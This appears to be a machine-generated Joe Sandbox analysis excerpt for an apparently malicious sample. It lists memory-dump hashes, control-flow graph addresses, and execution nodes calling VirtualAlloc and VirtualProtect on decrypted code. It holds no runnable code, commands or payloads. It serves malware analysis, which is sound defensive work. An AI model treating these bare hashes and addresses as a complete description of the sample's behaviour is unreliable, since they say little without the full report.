                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f86443170a2e1a358d92d0e202374890d9c266a8580282665a36705b5f11843d
                                                            • Instruction ID: 1cd601ee7372c5aee136e605e0d13c140616c2d8c6668ca38bbf236161e06d7c
                                                            • Opcode Fuzzy Hash: f86443170a2e1a358d92d0e202374890d9c266a8580282665a36705b5f11843d
                                                            • Instruction Fuzzy Hash: B8D05E22D0C2C38FEF3E7E7C5CA51B86FA19F0B384754067AC51E862C2D95CB9089752
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac80ac49e99d75ae80578173de1a1ef3c6d5ce87c8912fd4d9d1d26c36c3728f
                                                            • Instruction ID: 106f9a79ba7cf1984562216726230ea5813b579ae40452b476d5c97e225cab73
                                                            • Opcode Fuzzy Hash: ac80ac49e99d75ae80578173de1a1ef3c6d5ce87c8912fd4d9d1d26c36c3728f
                                                            • Instruction Fuzzy Hash: B6D0C93164C8458FDE98EE2CC084D6533E1EB583803254064D00BC76A0DA38E841EB10
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
                                                            • Instruction ID: 95685bb8437eca79c1dd0228b960365542510bf5fb37e4420c2eac98ae2c5003
                                                            • Opcode Fuzzy Hash: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
                                                            • Instruction Fuzzy Hash: A6C01275D198698EF75AEF1C480477562A1FB64A44F0463A1800CE3185EB315C428B08
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c213bec842cb2c6d8a257e655bf850255e64b95d87e6100f65e66cae7d157133
                                                            • Instruction ID: cda4edd791fcb8ca2ef4d4c975bbdd1ff09d3f7cbb47e9f8115d793ec7cbb457
                                                            • Opcode Fuzzy Hash: c213bec842cb2c6d8a257e655bf850255e64b95d87e6100f65e66cae7d157133
                                                            • Instruction Fuzzy Hash: 0ED0CA14A0CAC38DFE387E19812023A62AEAF10381F24963ED09F45DC1CD6CF8026302
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 276204985d10570151821e7276ab0221ef123013d92b2cd4ecf4fdaf64782011
                                                            • Instruction ID: f9ebcbbf97c7bc678f5558f1bb1d8a844df42a7e7f7129fd862139b9b19bd96f
                                                            • Opcode Fuzzy Hash: 276204985d10570151821e7276ab0221ef123013d92b2cd4ecf4fdaf64782011
                                                            • Instruction Fuzzy Hash: FBD09215A0D6DB8DFF786E0A82A023E31949F817C0F2A01BEC06F418C1891CF901A609
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
                                                            • Instruction ID: 76f3268c14a0b17498a4c0ed87e44403146b43fd8a6c88dd3ec45dc54090dd31
                                                            • Opcode Fuzzy Hash: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
                                                            • Instruction Fuzzy Hash: E3E04C70C0D26ACEEB756B1088082B9B564AF11355F1055B9D15D251C1D7795EC58F0A
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5808039ea587d6ecc9993bb7a0da0ac40f59a1cbf8f77f92ba7cc771ab61887
                                                            • Instruction ID: 531402d43bc6ea186b7f97a807ba061c78a5fe2d85ce682ec62a661c8565006d
                                                            • Opcode Fuzzy Hash: b5808039ea587d6ecc9993bb7a0da0ac40f59a1cbf8f77f92ba7cc771ab61887
                                                            • Instruction Fuzzy Hash: 82C08C2080C1C78FFB396B19803523937A09F423C0F2240BAC41E4A8E6CE2CB911D711
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3226d263c99e46c98692f3090050d7aec86cecebbe68fe6ca658f20b5e1fe37a
                                                            • Instruction ID: 5c63dda762042d28684991e9e7f469017347d7a7522aba65431c0de7fb70ee75
                                                            • Opcode Fuzzy Hash: 3226d263c99e46c98692f3090050d7aec86cecebbe68fe6ca658f20b5e1fe37a
                                                            • Instruction Fuzzy Hash: 56818D3091CA8D8FEBA8EF28C8457F977E1FB59350F10412AE84DC7292DB74A944CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5d5e051c975076e0f1a600bd9f77c445dd7377726e473929d0df6e0291513ad
                                                            • Instruction ID: 61414a7b2d9335615880266d469f9bf6a8cbedb8071df6234f89f57dcfc93301
                                                            • Opcode Fuzzy Hash: f5d5e051c975076e0f1a600bd9f77c445dd7377726e473929d0df6e0291513ad
                                                            • Instruction Fuzzy Hash: DB81D93090CA8D8FEBA8EF68D8457E97BE0FF59350F00412AE84DC7291DB75A485CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8c339205cd82e2b234e3cd66b8b4be55004a946f6697663cf37d7bde9364143
                                                            • Instruction ID: b9cb1a3500aa754dc9baca707c6b09af8f158e70f3c81c1654d0d1354576a5ce
                                                            • Opcode Fuzzy Hash: f8c339205cd82e2b234e3cd66b8b4be55004a946f6697663cf37d7bde9364143
                                                            • Instruction Fuzzy Hash: 1671AD30918A8D8FEBA8EF18D845BF977E1FF59350F10412AE84DC7291DB74A984CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9b8742bbfa9f63b0fbfe62ab69611c4603f32148c1a4a56fa5d2cf8267ba111
                                                            • Instruction ID: 774c5c9f9791e92b1380d67d36f8e7ef1fcd1a803b8c23c977cee9740dfdf143
                                                            • Opcode Fuzzy Hash: b9b8742bbfa9f63b0fbfe62ab69611c4603f32148c1a4a56fa5d2cf8267ba111
                                                            • Instruction Fuzzy Hash: 11719170918A8D8FEBA8EF18C845BF977E1FF59350F10412AE80DC7291DB74A984CB85

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:7
                                                            Total number of Limit Nodes:0
                                                            execution_graph 19234 7ff848f2207e 19235 7ff848f2208d VirtualProtect 19234->19235 19237 7ff848f221cd 19235->19237 19238 7ff848f23731 19239 7ff848f23741 19238->19239 19239->19239 19240 7ff848f23b4d VirtualAlloc 19239->19240 19241 7ff848f23ba5 19240->19241

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff848f2b6bd-7ff848f2b6f8 1 7ff848f2b6fa 0->1 2 7ff848f2b6ff-7ff848f2b75f 0->2 1->2 6 7ff848f2b76d-7ff848f2b77c 2->6 7 7ff848f2b761 2->7 8 7ff848f2b77e 6->8 9 7ff848f2b783-7ff848f2b78c 6->9 7->6 8->9 10 7ff848f2b7b9-7ff848f2b814 9->10 11 7ff848f2b78e-7ff848f2b79d 9->11 23 7ff848f2b81b-7ff848f2bab4 10->23 24 7ff848f2b816 10->24 12 7ff848f2b79f 11->12 13 7ff848f2b7a4-7ff848f2d125 call 7ff848f2e346 11->13 12->13 19 7ff848f2d130-7ff848f2d1f9 13->19 20 7ff848f2d127-7ff848f2d12f call 7ff848f2e346 13->20 40 7ff848f2d1ff-7ff848f2d2fd 19->40 41 7ff848f2d306-7ff848f2d35e 19->41 20->19 160 7ff848f2c79e-7ff848f2c7ab 23->160 24->23 40->41 92 7ff848f2d2ff 40->92 52 7ff848f2d364-7ff848f2d3af 41->52 53 7ff848f2d4f5-7ff848f2d5d1 41->53 65 7ff848f2d4dc-7ff848f2d4e9 52->65 97 7ff848f2d6b2-7ff848f2d6f8 53->97 98 7ff848f2d5d7-7ff848f2d6b0 call 7ff848f2b2a8 53->98 66 7ff848f2d4ef-7ff848f2d4f0 65->66 67 7ff848f2d3b4-7ff848f2d3c2 65->67 73 7ff848f2d8ad-7ff848f2d90c 66->73 71 7ff848f2d3c9-7ff848f2d449 67->71 72 7ff848f2d3c4 67->72 88 7ff848f2d44b 71->88 89 7ff848f2d450-7ff848f2d4ca 71->89 72->71 90 7ff848f2dbd4-7ff848f2dc01 73->90 88->89 133 7ff848f2d4cc-7ff848f2d4d1 89->133 134 7ff848f2d4d4-7ff848f2d4d9 89->134 99 7ff848f2d911-7ff848f2d94d 90->99 100 7ff848f2dc07-7ff848f2dc2b call 7ff848f2e3a9 90->100 92->41 115 7ff848f2d6ff-7ff848f2d705 97->115 98->115 112 7ff848f2d96a-7ff848f2dbd1 99->112 113 7ff848f2d94f-7ff848f2d966 99->113 125 7ff848f2dc2d 100->125 126 7ff848f2dc34-7ff848f2dc68 100->126 112->90 113->112 121 7ff848f2d89a-7ff848f2d8a7 115->121 121->73 124 7ff848f2d70a-7ff848f2d718 121->124 128 7ff848f2d71a 124->128 129 7ff848f2d71f-7ff848f2d7bf 124->129 125->126 135 7ff848f2dc6a-7ff848f2dc77 126->135 136 7ff848f2dc88-7ff848f2dca5 126->136 128->129 190 7ff848f2d82f-7ff848f2d857 129->190 191 7ff848f2d7c1-7ff848f2d7e9 129->191 133->134 134->65 139 7ff848f2dc79 135->139 140 7ff848f2dc7e-7ff848f2dc86 135->140 147 7ff848f2dcab-7ff848f2dd14 136->147 148 7ff848f2de64-7ff848f2de68 136->148 139->140 140->136 185 7ff848f2dd5d-7ff848f2dda9 147->185 186 7ff848f2dd16-7ff848f2dd5c 147->186 149 7ff848f2de6e-7ff848f2de77 148->149 150 7ff848f2e177-7ff848f2e1cf 148->150 155 7ff848f2de79-7ff848f2de7e 149->155 156 7ff848f2de81-7ff848f2de8a 149->156 181 7ff848f2e337-7ff848f2e344 150->181 182 7ff848f2e1d5-7ff848f2e26a 150->182 155->156 161 7ff848f2e161-7ff848f2e171 156->161 163 7ff848f2bab9-7ff848f2bac7 160->163 164 7ff848f2c7b1-7ff848f2c7bc 160->164 161->150 165 7ff848f2de8f-7ff848f2dea0 161->165 170 7ff848f2bac9 163->170 171 7ff848f2bace-7ff848f2bb3b 163->171 175 7ff848f2c81b-7ff848f2c855 164->175 176 7ff848f2c7be-7ff848f2c7f3 164->176 168 7ff848f2dea2 165->168 169 7ff848f2dea7-7ff848f2df47 165->169 168->169 231 7ff848f2df4d-7ff848f2dfad 169->231 232 7ff848f2e153-7ff848f2e15b 169->232 170->171 171->160 200 7ff848f2c882-7ff848f2c8ad 175->200 201 7ff848f2c857-7ff848f2c85b 175->201 211 7ff848f2c8b0-7ff848f2c8b6 176->211 182->181 237 7ff848f2e270-7ff848f2e281 182->237 185->148 225 7ff848f2ddaf-7ff848f2ddbb 185->225 186->185 196 7ff848f2d859 190->196 197 7ff848f2d85e-7ff848f2d887 190->197 192 7ff848f2d7eb 191->192 193 7ff848f2d7f0-7ff848f2d82d 191->193 192->193 223 7ff848f2d892-7ff848f2d897 193->223 196->197 197->223 200->211 201->200 207 7ff848f2c85d-7ff848f2c87f 201->207 207->200 215 7ff848f2c7f8-7ff848f2c81a 211->215 216 7ff848f2c8bc-7ff848f2c8fe 211->216 215->175 238 7ff848f2cb4c-7ff848f2cb52 216->238 223->121 225->148 229 7ff848f2ddc1-7ff848f2de59 225->229 229->148 251 7ff848f2dfaf 231->251 252 7ff848f2dfb4-7ff848f2dfbd 231->252 232->161 242 7ff848f2e288-7ff848f2e335 237->242 243 7ff848f2e283 237->243 240 7ff848f2cb58-7ff848f2cbb1 238->240 241 7ff848f2c903-7ff848f2ca4b 238->241 255 7ff848f2cc40-7ff848f2cc97 240->255 256 7ff848f2cbb7-7ff848f2cc03 240->256 301 7ff848f2cadd-7ff848f2cae1 241->301 302 7ff848f2ca51-7ff848f2cadb 241->302 242->181 243->242 251->252 257 7ff848f2e12c-7ff848f2e13a 252->257 258 7ff848f2dfc3-7ff848f2e01b 252->258 286 7ff848f2d0f7-7ff848f2d0fd 255->286 256->255 260 7ff848f2e13c 257->260 261 7ff848f2e141-7ff848f2e149 257->261 278 7ff848f2e021-7ff848f2e04d 258->278 279 7ff848f2e0a7-7ff848f2e0d5 258->279 260->261 266 7ff848f2e14b-7ff848f2e150 261->266 266->232 281 7ff848f2e04f 278->281 282 7ff848f2e054-7ff848f2e0a2 278->282 284 7ff848f2e0dc-7ff848f2e12a 279->284 285 7ff848f2e0d7 279->285 281->282 282->266 284->266 285->284 290 7ff848f2cc9c-7ff848f2cd3a 286->290 291 7ff848f2d103-7ff848f2d11b 286->291 308 7ff848f2cd6a-7ff848f2cd79 290->308 309 7ff848f2cd3c-7ff848f2cd5f 290->309 291->20 304 7ff848f2cae3-7ff848f2cb15 301->304 305 7ff848f2cb17-7ff848f2cb2a 301->305 313 7ff848f2cb2b-7ff848f2cb49 302->313 304->313 305->313 315 7ff848f2cd7b 308->315 316 7ff848f2cd80-7ff848f2cd8f 308->316 309->308 313->238 315->316 318 7ff848f2cd91-7ff848f2cd9f 316->318 319 7ff848f2cda4-7ff848f2cdbf 316->319 322 7ff848f2d0d6-7ff848f2d0f4 318->322 323 7ff848f2cddf-7ff848f2d0cb 319->323 324 7ff848f2cdc1-7ff848f2cddb 319->324 322->286 323->322 324->323
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NM_H$lM_H
                                                            • API String ID: 0-209739149
                                                            • Opcode ID: 2fca934d00e9d02cb2cef69e964ba5208c5296f946a68d54432061534d4f98d2
                                                            • Instruction ID: 6181978d8cd5d2dec3264fb7fbc490e77ba61c9d14fa9345894578282e7eaf39
                                                            • Opcode Fuzzy Hash: 2fca934d00e9d02cb2cef69e964ba5208c5296f946a68d54432061534d4f98d2
                                                            • Instruction Fuzzy Hash: FF03C970D0992D8FDB98EB18D895BA9B7B1FF58341F1042E9D00DE3296DB35AA81CF44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 806 7ff848f10dac-7ff848f10dbf 807 7ff848f10dc1 806->807 808 7ff848f10dc2-7ff848f10df9 806->808 807->808 809 7ff848f10dfb 808->809 810 7ff848f10e00-7ff848f10eb7 call 7ff848f107c8 808->810 809->810 823 7ff848f10eb9-7ff848f10ece 810->823 824 7ff848f10ecf-7ff848f10fa8 810->824 823->824 837 7ff848f10faa-7ff848f10fbe 824->837 838 7ff848f10fc0-7ff848f10fe3 824->838 837->838 843 7ff848f10feb-7ff848f110dc 838->843
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fad8caf0ad389e76f92c06c758fb0180b1e2966f56a9e6cb34681cba6299ead4
                                                            • Instruction ID: 5d0280f985bf65584b366936026ce231369d32c5b2ff0aa687699c1267b62be6
                                                            • Opcode Fuzzy Hash: fad8caf0ad389e76f92c06c758fb0180b1e2966f56a9e6cb34681cba6299ead4
                                                            • Instruction Fuzzy Hash: 24A1B971919A9A9FE798EB2CC8693AA7FE1FB99354F00017AC008D72D2DF781851C750

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$X
                                                            • API String ID: 0-1506445976
                                                            • Opcode ID: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
                                                            • Instruction ID: d9ddb999048f3af8c650fce20fb5c9e20bfaaaf14ded0af2f72f55149dafc962
                                                            • Opcode Fuzzy Hash: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
                                                            • Instruction Fuzzy Hash: 2C11C5709482298FEB64EB14C8987ECB3B1FB94351F5052E9D50DA62C2CB785EC9CF48

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 352 7ff848f23731-7ff848f23747 354 7ff848f23749 352->354 354->354 355 7ff848f2374b-7ff848f23765 354->355 357 7ff848f2376c-7ff848f237bb 355->357 358 7ff848f23767 355->358 361 7ff848f237bd 357->361 362 7ff848f237c2-7ff848f237e7 357->362 358->357 361->362 364 7ff848f237e9 362->364 364->364 365 7ff848f237eb-7ff848f2380b 364->365 367 7ff848f2380d 365->367 368 7ff848f23812-7ff848f23865 365->368 367->368 371 7ff848f2386c-7ff848f238b9 368->371 372 7ff848f23867 368->372 375 7ff848f238bb 371->375 376 7ff848f238c0-7ff848f238e7 371->376 372->371 375->376 378 7ff848f238e9 376->378 378->378 379 7ff848f238eb-7ff848f23910 378->379 381 7ff848f23912 379->381 382 7ff848f23917-7ff848f23988 379->382 381->382 385 7ff848f2398a 382->385 386 7ff848f2398f-7ff848f23998 382->386 385->386 387 7ff848f23a2a-7ff848f23a87 386->387 388 7ff848f2399e call 7ff848f21ac0 386->388 392 7ff848f23a89 387->392 390 7ff848f239a3-7ff848f23a23 388->390 390->387 392->392 394 7ff848f23a8b-7ff848f23ba3 VirtualAlloc 392->394 403 7ff848f23bab-7ff848f23c0f 394->403 404 7ff848f23ba5 394->404 404->403
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 872f4ae6a23658a5ff713dfc8d02f02050060f74a0dd811337ee3560c3804aca
                                                            • Instruction ID: 930bb05a1dcab7fa665f57d66fdedd8482c5f84ec2534218bcf25766372b7ee7
                                                            • Opcode Fuzzy Hash: 872f4ae6a23658a5ff713dfc8d02f02050060f74a0dd811337ee3560c3804aca
                                                            • Instruction Fuzzy Hash: 8402A07080D68D8FDB95EF68D855AE9BFF0FF59300F0401AAE448D72A2DB35A985CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 409 7ff848f236f0-7ff848f236f3 410 7ff848f23741-7ff848f23747 409->410 411 7ff848f236f5-7ff848f236f8 409->411 412 7ff848f23749 410->412 411->410 412->412 413 7ff848f2374b-7ff848f23765 412->413 415 7ff848f2376c-7ff848f237bb 413->415 416 7ff848f23767 413->416 419 7ff848f237bd 415->419 420 7ff848f237c2-7ff848f237e7 415->420 416->415 419->420 422 7ff848f237e9 420->422 422->422 423 7ff848f237eb-7ff848f2380b 422->423 425 7ff848f2380d 423->425 426 7ff848f23812-7ff848f23865 423->426 425->426 429 7ff848f2386c-7ff848f238b9 426->429 430 7ff848f23867 426->430 433 7ff848f238bb 429->433 434 7ff848f238c0-7ff848f238e7 429->434 430->429 433->434 436 7ff848f238e9 434->436 436->436 437 7ff848f238eb-7ff848f23910 436->437 439 7ff848f23912 437->439 440 7ff848f23917-7ff848f23988 437->440 439->440 443 7ff848f2398a 440->443 444 7ff848f2398f-7ff848f23998 440->444 443->444 445 7ff848f23a2a-7ff848f23a87 444->445 446 7ff848f2399e-7ff848f23a23 call 7ff848f21ac0 444->446 450 7ff848f23a89 445->450 446->445 450->450 452 7ff848f23a8b-7ff848f23ba3 VirtualAlloc 450->452 461 7ff848f23bab-7ff848f23c0f 452->461 462 7ff848f23ba5 452->462 462->461
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebfe3de5d49c07a89893bdbb2034e2805744e0c0dd63046d405a95f2df642e93
                                                            • Instruction ID: be5405f8c64e7a8128b58912e594f5f275b9adfa2c24fa166d4e455161a5f4eb
                                                            • Opcode Fuzzy Hash: ebfe3de5d49c07a89893bdbb2034e2805744e0c0dd63046d405a95f2df642e93
                                                            • Instruction Fuzzy Hash: 1A02AF7080D68D8FDB95EF68D8556E9BFF0FF59300F0401AAD448D72A2DB35A985CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 467 7ff848f2207e-7ff848f2208b 468 7ff848f2208d-7ff848f22095 467->468 469 7ff848f22096-7ff848f220a7 467->469 468->469 470 7ff848f220a9-7ff848f220b1 469->470 471 7ff848f220b2-7ff848f221cb VirtualProtect 469->471 470->471 476 7ff848f221cd 471->476 477 7ff848f221d3-7ff848f22223 471->477 476->477
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: af46da1f7898ef12c3b7a0cf3a19e0215576f223df72b38fa9922d7b69d759a6
                                                            • Instruction ID: 57666cd17b33c523ef0675bb78722952a9454145d75f0f9bbcc12ff16c6fc12e
                                                            • Opcode Fuzzy Hash: af46da1f7898ef12c3b7a0cf3a19e0215576f223df72b38fa9922d7b69d759a6
                                                            • Instruction Fuzzy Hash: 1C518D30D0864D8FEB54DFA8D885AEDBBF1FB66310F10426AD449E3252DB75A885CB81

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MJ_H
                                                            • API String ID: 0-1880350675
                                                            • Opcode ID: 717460a6e5c5f4ec2f92ef510797835fda4400f8beaf5fa5a826fff8e6ac2dd7
                                                            • Instruction ID: ec09e3c5050cce66e0ac886f3a10a4374f920bbc974b0f926f93a3b40fc6253d
                                                            • Opcode Fuzzy Hash: 717460a6e5c5f4ec2f92ef510797835fda4400f8beaf5fa5a826fff8e6ac2dd7
                                                            • Instruction Fuzzy Hash: C7F14771D1AA5A9FDB98EB68C8657E8B7B1FF59340F4441B9D00DE32C2CB386884CB45

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 3297c4a3edcfa41390dc8df383a44300dd38723195d819d4ec823e5f397e33bd
                                                            • Instruction ID: 6b8f21867bc98df8f03d219a66172e1de10c0ba6a3d9c768253d71902d13ff2f
                                                            • Opcode Fuzzy Hash: 3297c4a3edcfa41390dc8df383a44300dd38723195d819d4ec823e5f397e33bd
                                                            • Instruction Fuzzy Hash: D1810770D1C619CFEBA8EB58C8557A8B7F1FB59340F1041BAC04EE3282DB7869858F55

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 603 7ff848f267a7-7ff848f267b2 605 7ff848f2681c 603->605 606 7ff848f267b4-7ff848f267da 603->606 607 7ff848f2681e-7ff848f26828 605->607 608 7ff848f26836-7ff848f2683d 605->608 611 7ff848f267e4-7ff848f26815 606->611 607->608 609 7ff848f2685d-7ff848f27045 608->609 610 7ff848f2683f-7ff848f27008 608->610 609->608 610->608 620 7ff848f2700e-7ff848f27018 610->620 611->605 620->608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F26000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f26000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 1fd53b3bfe38969774012ba39deef8edaf799bb5ec37be08d5ebbc9c1d744a8e
                                                            • Instruction ID: 3e96e11d2842d56d328d0a6feb4f219c00f5d660997e858fae1a7f62fc933f88
                                                            • Opcode Fuzzy Hash: 1fd53b3bfe38969774012ba39deef8edaf799bb5ec37be08d5ebbc9c1d744a8e
                                                            • Instruction Fuzzy Hash: 8521B7749085698EEBA4EF08D854BACB7F1FF58350F1085EAD00DE2291DB796A85CF14
                                                            Memory Dump Source
